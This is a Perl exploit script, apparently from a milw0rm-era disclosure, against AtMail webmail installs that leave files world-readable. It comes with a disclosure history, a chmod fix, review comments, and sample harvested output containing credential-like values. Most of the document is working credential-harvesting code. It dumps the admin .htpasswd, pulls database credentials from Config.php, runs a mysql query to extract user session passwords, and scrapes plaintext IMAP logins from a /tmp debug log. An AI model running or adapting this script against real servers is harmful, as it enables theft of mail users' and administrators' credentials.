AtMail leaves world-readable files in place after installation, allowing the .htpasswd file and more to be read.
4cdb25f15cb84fcb65b8a8362e83c80708f7391a4778ac56436fdc5a11d8a1b0
#!/usr/bin/perl
################################################################################
#
# LEGAL:
# Permission is granted to freely reproduce this document in its entirety
# under the condition that the contents are not altered in any way.
# milw0rm IS permitted to add their standard footer: // milw0rm.com / date
# Permission to view or reproduce this file is NOT granted to any
# individual with the first name Gadi and the last name Evron, due to the
# prior history of at least 1 individual with this name of making false
# claims that researchers notified them about recently released exploits.
#
# PRODUCT:
# AtMail - atmail.com
#
# VENDOR:
# CalaCode - calacode.com
#
# DOWNLOAD:
# http://atmail.org/download/atmailopen.tgz
# http://atmail.com/demo/atmailphpdemo.tgz
#
# PROBLEM:
# World readable files in the default install lead to sensitive
# information disclosure, loss of integrity.
#
# SOLUTION:
# chmod 640 /path/to/Config.php /path/to/.htpasswd
#
# NOTIFICATION:
# 5/27/2008 - Several emails were sent back and forth, explaining how the
# world readable Config.php issue could be abused. Multiple subsequent
# attempts to obtain a status update from the vendor went unanswered.
# It's now 07/29/2008. Instead of taking a few moments of their time to
# bring the level of security of the servers this software is installed
# on back up to the same level it was BEFORE this software was installed
# (excluding any other vulnerabilities that may exist in this software),
# the vendor is happily pushing their product at HostingCon at this time.
# (JULY 28-30, 2008).
#
# STATUS:
# Not fixed.
#
# USAGE:
# ./atmail.pl
#
# or simply use it as a CGI script. The vendor claims that ssh access is
# required to abuse this issue. What they really mean is that all someone
# needs is the ability to invoke a few commands from the shell. This is
# easily done in countless ways without requiring authentication via ssh.
#
# +----------------------------------------------------+
# | WEBADMIN USER CREDENTIALS (.htpasswd) |
# +----------------------------------------------------+
# admin:$apr1$L.BPJMnK$sjep5SUN4PG5A.Anw5/Id0
#
# +----------------------------------------------------+
# | DATABASE CREDENTIALS (Config.php) |
# +----------------------------------------------------+
# USER: atmail
# PASS: AF4hubB493
# HOST: localhost
#
# +----------------------------------------------------+
# | CLIENT CREDENTIALS (MySQL) |
# +----------------------------------------------------+
# USER: alice@atmail.com PASS: atmail
# USER: bob@atmail.com PASS: doesn't
# USER: carol@atmail.com PASS: getit
#
# +----------------------------------------------------+
# | MORE CLIENT CREDENTIALS (/tmp/popimap_debug) |
# +----------------------------------------------------+
# USER: alice PASS: atmail
# USER: bob PASS: doesn't
# USER: carol PASS: getit
#
#
# ADDED BONUS: client information persists in the database even after the user
# has logged off.
#
# To make this code work, you must fill in the paths. I don't condone
# malicious use of the information provided in this script, just as I don't
# condone vendor complacency.
#
# If you have found any of this information to be useful to you or someone
# you know, PLEASE consider donating to the Julie Amero Defense Fund:
#
# Official Blog
# http://julieamer.blogspot.com
#
# Trial Transcript
# http://julieamero.blogspot.com
#
# http://google.com/search?q=julie+amero
#
# and/or contacting news outlets, state legislators, the prosecution, etc and
# letting them know your thoughts in a polite and professional manner.
#
################################################################################
# print "Content-type: text/plain\n\n";
use strict;
use warnings;
# Base directory of the AtMail install, taken from the first command-line
# argument; falls back to '' when none is given.
my $atmail_path = shift || '';
# Both file locations are $atmail_path plus an empty suffix: the suffixes
# must be filled in by hand before the script reads anything (see USAGE).
my $atmail_htpasswd_path = $atmail_path . '';
my $atmail_config_path = $atmail_path . '';
# Assigned but never read; the debug log is opened by a literal path below.
my $atmail_popimap_debug = '';
# Set while scanning Config.php. All three stay undef if that file cannot be
# opened or none of the patterns below match.
my ( $sql_user, $sql_pass, $sql_host );
# An empty path fails -e, so running with no argument dies here.
-e $atmail_path or die "$atmail_path does not exist\n";
###############################################################################
# For logging into https://example.com/atmail/webadmin
###############################################################################
# Every section is guarded by its open succeeding: once a file is no longer
# readable by this process (the SOLUTION in the header is chmod 640) the
# section is silently skipped. A failed open is not reported anywhere.
if ( open my $atmail_htpasswd_path_fh, '<', $atmail_htpasswd_path )
{
print_line();
print "|\tWEBADMIN USER CREDENTIALS (.htpasswd) |\n";
print_line();
# The .htpasswd file is echoed verbatim, line by line.
while ( <$atmail_htpasswd_path_fh> ) {
print;
}
close $atmail_htpasswd_path_fh;
print "\n";
}
###############################################################################
# For accessing the atmail db
###############################################################################
if ( open my $atmail_config_fh, '<', $atmail_config_path )
{
print_line();
print "|\tDATABASE CREDENTIALS (Config.php) |\n";
print_line();
# Each pattern picks up a line of the form  sql_user' => 'value',  (the
# escaped \s are single whitespace characters under /x). The greedy (.*)
# runs to the last  ',  on the line, and the last matching line wins.
while ( <$atmail_config_fh> )
{
$sql_user = $1 if ( m{ sql_user ' \s => \s ' (.*) ' , }ixms );
$sql_pass = $1 if ( m{ sql_pass ' \s => \s ' (.*) ' , }ixms );
$sql_host = $1 if ( m{ sql_host ' \s => \s ' (.*) ' , }ixms );
}
close $atmail_config_fh;
# Any value that was never captured is undef and interpolates as an empty
# string with a "Use of uninitialized value" warning.
print "USER: $sql_user\nPASS: $sql_pass\nHOST: $sql_host\n";
print "\n";
}
###############################################################################
# For reading grandma's email
###############################################################################
# NOTE(review): the three values are interpolated unquoted into a single
# command string, which the pipe open below hands to the shell because of the
# quotes and spaces it contains; a Config.php value containing shell
# metacharacters would change what gets executed. The password is also
# passed as a command-line argument (-p), so it is visible in the process
# list for as long as the mysql client runs. This line is evaluated even
# when the Config.php section was skipped, with undef (warned) values.
my $sessions = "mysql -h $sql_host -u $sql_user -p$sql_pass atmail -e 'select * from UserSession \\G'";
if ( open my $mysql_fh, '-|', $sessions )
{
print_line();
print "|\tCLIENT CREDENTIALS (MySQL) |\n";
print_line();
# The client's output is scanned line by line for "Account:" and
# "Password:" fields. A USER entry is printed with a trailing tab and no
# newline, relying on a following Password: line to terminate it.
while ( <$mysql_fh> )
{
if ( m{ Account: \s (\S+) }xms ) {
print "USER: $1\t";
}
elsif ( m{ Password: \s (\S+) }xms ) {
print "PASS: $1\n";
}
}
close $mysql_fh;
print "\n";
}
###############################################################################
# Debugging is not enabled by default, and you do have the choice of
# configuring the location of the debug log. The default is /tmp/popimap_debug
# which also presents a symlink attack issue if left to the default setting.
###############################################################################
# The path is hard-coded here; $atmail_popimap_debug above is not consulted.
if ( open my $popimap_debug_fh, '<', '/tmp/popimap_debug' )
{
# user => password, keyed so that repeated logins for the same user collapse
# to one entry (the later line overwrites the earlier one).
my %accounts;
print_line();
print "|\tMORE CLIENT CREDENTIALS (/tmp/popimap_debug) |\n";
print_line();
# Declared but unused; the captures go straight into %accounts.
my ( $popimap_debug_user, $popimap_debug_pass );
# Matches client-side lines of the form  C: ATMAIL00 LOGIN "user" "pass"
# (case-insensitive, anchored at the start of the line).
while ( <$popimap_debug_fh> )
{
if ( m{ \A C: \s ATMAIL00 \s LOGIN \s "(.*)" \s "(.*)" }ixms ) {
$accounts{$1} = $2;
}
}
close $popimap_debug_fh;
# Hash iteration order is unspecified, so entries print in no fixed order.
while ( my ( $user, $pass ) = each ( %accounts ) ) {
print "USER: $user\tPASS: $pass\n";
}
print "\n";
}
# Prints the horizontal rule that frames each section heading.
sub print_line
{
    my $rule = "+----------------------------------------------------+\n";
    print $rule;
}